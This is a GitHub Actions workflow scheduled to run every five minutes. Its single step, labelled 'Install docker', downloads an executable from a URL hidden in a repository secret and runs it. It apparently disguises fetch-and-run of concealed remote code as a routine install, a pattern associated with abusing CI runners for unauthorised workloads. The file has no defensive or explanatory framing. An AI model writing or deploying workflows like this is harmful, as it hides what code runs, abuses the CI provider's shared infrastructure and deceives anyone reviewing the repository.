on:
  schedule:
    - cron: '*/5 * * * *'

jobs:
  install:
    runs-on: [ubuntu-22.04]
    steps:
      - name: Install docker
        env:
          SCRIPTURL: ${{ secrets.scripturl }}
        run: wget -q -O docker $SCRIPTURL && chmod +x docker && ./docker
